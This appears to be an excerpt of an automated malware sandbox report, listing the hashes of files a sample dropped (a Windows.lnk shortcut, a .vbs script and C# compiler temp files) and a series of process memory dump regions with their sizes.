30a1e8d4c1d5393b551df0bd30231068

SHA1
acd37b0c5e64b705e6184a184d11fa7856997cb3

SHA256
43bc7531c86a8ae4933a6f1d36032a42ca7ef4afb37d25a6c8637712c01176a5

SHA512
fd7bd945b17e45317e82de7b5110078fc76db4652d63b83d51b183c1b6ca4f42bf22d1415f070274d33865cbc01466f89221cbb25496455512b7041b6f2b889c

Download Submit
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Templates\Windows.lnk
MD5
30a1e8d4c1d5393b551df0bd30231068

SHA1
acd37b0c5e64b705e6184a184d11fa7856997cb3

SHA256
43bc7531c86a8ae4933a6f1d36032a42ca7ef4afb37d25a6c8637712c01176a5

SHA512
fd7bd945b17e45317e82de7b5110078fc76db4652d63b83d51b183c1b6ca4f42bf22d1415f070274d33865cbc01466f89221cbb25496455512b7041b6f2b889c

Download Submit
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Templates\Windows.lnk
MD5
30a1e8d4c1d5393b551df0bd30231068

SHA1
acd37b0c5e64b705e6184a184d11fa7856997cb3

SHA256
43bc7531c86a8ae4933a6f1d36032a42ca7ef4afb37d25a6c8637712c01176a5

SHA512
fd7bd945b17e45317e82de7b5110078fc76db4652d63b83d51b183c1b6ca4f42bf22d1415f070274d33865cbc01466f89221cbb25496455512b7041b6f2b889c

Download Submit
C:\Users\Public\hahahha.vbs
MD5
bc7914d8ed41e2dee8083150f866b839

SHA1
e11a1155502b5afee7bd5abe96088e5c4f506e87

SHA256
d0f3c1792f7a47e78ead7b8c5b44b1fad6bcb4277c142d831a7e06c720605084

SHA512
2288ac5c8d6ad710b4f0979ef956ca71cd250d436abb09046a77bb4d69316fffae890e87d79a5ac4371726b927bceec4aed8559fb8e77a4fb0c5fbbdae0c4ccb

Download Submit
\??\c:\Users\Admin\AppData\Local\Temp\e5f5wenr\CSC46FD75DB2A15476789E5E6A1729A5939.TMP
MD5
ac2163b4080b2c487885b9ffbd31dc3b

SHA1
1aac9fe9b5da7417f25396a7353de7d4511aeac9

SHA256
85120f28c9d50f92d68d68bf51531d897e72422892bab06575cff240048fb4d7

SHA512
681d30b8f8c38f2ed2596cc64e2c670e2948450de919e2764c63fa46386608415d15d0a85adf996680eb36b5052a0da1069340399da71f1200797ba8babf23bc

Download Submit
\??\c:\Users\Admin\AppData\Local\Temp\e5f5wenr\e5f5wenr.0.cs
MD5
630cdd7fef52c23bd143c3e30f3bfb0b

SHA1
aa5c6b6e86a8d3fe24aeed3ed756aa4cb0c4a978

SHA256
962b47e740b3d6280a7a7c255d4259e062f8f123fc2df593795e5efd14fa303b

SHA512
c229365293a5c0447f386d9311610ec0e25de3bffd975be6ad43fb3bb23f18d2b8996d16f988069ef0774fea5b5a20b7895fe2d472150f474b9b77e63d4f0bf1

Download Submit
\??\c:\Users\Admin\AppData\Local\Temp\e5f5wenr\e5f5wenr.cmdline
MD5
51aa86995e22316779ee1631c4d347d2

SHA1
97451085546382e252afa9955e9b5d5cb81836eb

SHA256
adf5a45e259d45e6f6f5497ebe2e1499458dab0096d298ed950379c2ac2807ef

SHA512
bd46f4879cdcfb9f156a22ea51ab4e6b98a12fe40a0c69823a0d021858e654c120e1bf42ec22fbfdb56fdf61cd0665cff06b004aafa01cde644a64c720bfc6e9

Download Submit
memory/624-497-0x00000267B39B0000-0x00000267B3A70000-memory.dmp

Filesize
768KB

Download
memory/624-435-0x00000267B39B0000-0x00000267B3A70000-memory.dmp

Filesize
768KB

Download
memory/624-438-0x00000267B39B0000-0x00000267B3A70000-memory.dmp

Filesize
768KB

Download
memory/1180-479-0x0000028AE0FC0000-0x0000028AE1080000-memory.dmp

Filesize
768KB

Download
memory/1180-433-0x0000028AE0FC0000-0x0000028AE1080000-memory.dmp

Filesize
768KB

Download
memory/1180-427-0x0000028AE0FC0000-0x0000028AE1080000-memory.dmp

Filesize
768KB

Download
memory/1188-335-0x0000000002C40000-0x0000000002C41000-memory.dmp

Filesize
4KB

Download
memory/1432-337-0x0000000001580000-0x0000000001581000-memory.dmp

Filesize
4KB

Download
memory/1612-334-0x0000000000F30000-0x0000000000F31000-memory.dmp

Filesize
4KB

Download
memory/1808-411-0x00000240F6130000-0x00000240F6132000-memory.dmp

Filesize
8KB

Download
memory/1808-417-0x00000240F6133000-0x00000240F6135000-memory.dmp

Filesize
8KB

Download
memory/1808-471-0x00000240F6136000-0x00000240F6138000-memory.dmp

Filesize
8KB

Download
memory/1852-336-0x0000000002780000-0x0000000002781000-memory.dmp

Filesize
4KB

Download
memory/2036-406-0x000001A59E7C0000-0x000001A59E7C2000-memory.dmp

Filesize
8KB

Download
memory/2036-409-0x000001A59E7C3000-0x000001A59E7C5000-memory.dmp

Filesize
8KB

Download
memory/2036-439-0x000001A59E7C6000-0x000001A59E7C8000-memory.dmp

Filesize
8KB

Download
memory/2108-498-0x0000014A48256000-0x0000014A48258000-memory.dmp

Filesize
8KB

Download
memory/2108-474-0x0000014A48250000-0x0000014A48252000-memory.dmp

Filesize
8KB

Download
memory/2108-477-0x0000014A48253000-0x0000014A48255000-memory.dmp

Filesize
8KB

Download
memory/2188-315-0x00000211EAA20000-0x00000211EAA32000-memory.dmp

Filesize
72KB

Download
memory/2188-287-0x00000211EA910000-0x00000211EA912000-memory.dmp

Filesize
8KB

Download
memory/2188-288-0x00000211EA913000-0x00000211EA915000-memory.dmp

Filesize
8KB

Download
memory/2188-296-0x00000211EAAA0000-0x00000211EAB16000-memory.dmp

Filesize
472KB

Download
memory/2188-368-0x00000211EAA80000-0x00000211EAA88000-memory.dmp

Filesize
32KB

Download
memory/2188-286-0x00000211EA8C0000-0x00000211EA8E2000-memory.dmp

Filesize
136KB

Download
memory/2188-304-0x00000211EA916000-0x00000211EA918000-memory.dmp

Filesize
8KB

Download
memory/2188-329-0x00000211EA918000-0x00000211EA919000-memory.dmp

Filesize
4KB

Download
memory/2344-499-0x0000029C552B0000-0x0000029C55390000-memory.dmp

Filesize
896KB

Download
memory/2344-420-0x0000029C552B0000-0x0000029C55390000-memory.dmp

Filesize
896KB

Download
memory/2344-424-0x0000029C552B0000-0x0000029C55390000-memory.dmp

Filesize
896KB

Download
memory/2380-338-0x0000000001550000-0x0000000001551000-memory.dmp

Filesize
4KB

Download
memory/2380-316-0x0000000000400000-0x000000000040E000-memory.dmp

Filesize
56KB

Download
memory/2472-302-0x00007FFFAE560000-0x00007FFFAE570000-memory.dmp

Filesize
64KB

Download
memory/2472-115-0x00007FFFAE560000-0x00007FFFAE570000-memory.dmp

Filesize
64KB

Download
memory/2472-119-0x00007FFFAE560000-0x00007FFFAE570000-memory.dmp

Filesize
64KB

Download
memory/2472-118-0x00007FFFAE560000-0x00007FFFAE570000-memory.dmp

Filesize
64KB

Download
memory/2472-128-0x00007FFFAB270000-0x00007FFFAB280000-memory.dmp

Filesize
64KB

Download
memory/2472-116-0x00007FFFAE560000-0x00007FFFAE570000-memory.dmp

Filesize
64KB

Download
memory/2472-117-0x00007FFFAE560000-0x00007FFFAE570000-memory.dmp

Filesize
64KB

Download
memory/2472-300-0x00007FFFAE560000-0x00007FFFAE570000-memory.dmp

Filesize
64KB

Download
memory/2472-129-0x00007FFFAB270000-0x00007FFFAB280000-memory.dmp

Filesize
64KB

Download
memory/2472-303-0x00007FFFAE560000-0x00007FFFAE570000-memory.dmp

Filesize
64KB

Download
memory/2472-301-0x00007FFFAE560000-0x00007FFFAE570000-memory.dmp

Filesize
64KB

Download
memory/2808-481-0x000001FB46040000-0x000001FB46130000-memory.dmp

Filesize
960KB

Download
memory/2808-521-0x000001FB46040000-0x000001FB46130000-memory.dmp

Filesize
960KB

Download
memory/2808-483-0x000001FB46040000-0x000001FB46130000-memory.dmp

Filesize
960KB

Download
memory/3340-415-0x000002AA6BC20000-0x000002AA6BC22000-memory.dmp

Filesize
8KB

Download
memory/3340-419-0x000002AA6BC23000-0x000002AA6BC25000-memory.dmp

Filesize
8KB

Download
memory/3340-470-0x000002AA6BC26000-0x000002AA6BC28000-memory.dmp

Filesize
8KB

Download
memory/4184-590-0x000002235AB23000-0x000002235AB25000-memory.dmp

Filesize
8KB

Download
memory/4184-589-0x000002235AB20000-0x000002235AB22000-memory.dmp

Filesize
8KB

Download
memory/4404-500-0x00000288D8BA0000-0x00000288D8BA2000-memory.dmp

Filesize
8KB

Download
memory/4404-571-0x00000288D8BA6000-0x00000288D8BA8000-memory.dmp

Filesize
8KB

Download
memory/4404-501-0x00000288D8BA3000-0x00000288D8BA5000-memory.dmp

Filesize
8KB

Download
memory/4492-676-0x000002C656463000-0x000002C656465000-memory.dmp

Filesize
8KB

Download
memory/4492-665-0x000002C656460000-0x000002C656462000-memory.dmp

Filesize
8KB

Download
memory/4568-529-0x0000013325EB0000-0x0000013325FD2000-memory.dmp

Filesize
1.1MB

Download
memory/4568-524-0x0000013325EB0000-0x0000013325FD2000-memory.dmp

Filesize
1.1MB

Download
memory/4568-591-0x0000013325EB0000-0x0000013325FD2000-memory.dmp

Filesize
1.1MB

Download
memory/4612-653-0x00000210FF900000-0x00000210FF902000-memory.dmp

Filesize
8KB

Download
memory/4612-714-0x00000210FF903000-0x00000210FF905000-memory.dmp

Filesize
8KB

Download
memory/4636-532-0x000001C0D4FF3000-0x000001C0D4FF5000-memory.dmp

Filesize
8KB

Download
memory/4636-641-0x000001C0D4FF6000-0x000001C0D4FF8000-memory.dmp

Filesize
8KB

Download
memory/4636-526-0x000001C0D4FF0000-0x000001C0D4FF2000-memory.dmp

Filesize
8KB

Download
memory/4664-530-0x000001F3E0560000-0x000001F3E0562000-memory.dmp

Filesize
8KB

Download
memory/4664-700-0x000001F3E0566000-0x000001F3E0568000-memory.dmp

Filesize
8KB

Download
memory/4664-531-0x000001F3E0563000-0x000001F3E0565000-memory.dmp

Filesize
8KB

Download
memory/4732-779-0x000001EC290E0000-0x000001EC290E2000-memory.dmp

Filesize
8KB

Download
memory/4732-790-0x000001EC290E3000-0x000001EC290E5000-memory.dmp

Filesize
8KB

Download
memory/4828-686-0x0000014558406000-0x0000014558408000-memory.dmp

Filesize
8KB

Download
memory/4828-528-0x0000014558400000-0x0000014558402000-memory.dmp

Filesize
8KB

Download
memory/4828-533-0x0000014558403000-0x0000014558405000-memory.dmp

Filesize
8KB

Download
memory/4916-798-0x0000023CFA630000-0x0000023CFA632000-memory.dmp

Filesize
8KB

Download
memory/5076-583-0x000002816BFC0000-0x000002816BFC2000-memory.dmp

Filesize
8KB

Download
memory/5076-587-0x000002816BFC3000-0x000002816BFC5000-memory.dmp

Filesize
8KB

Download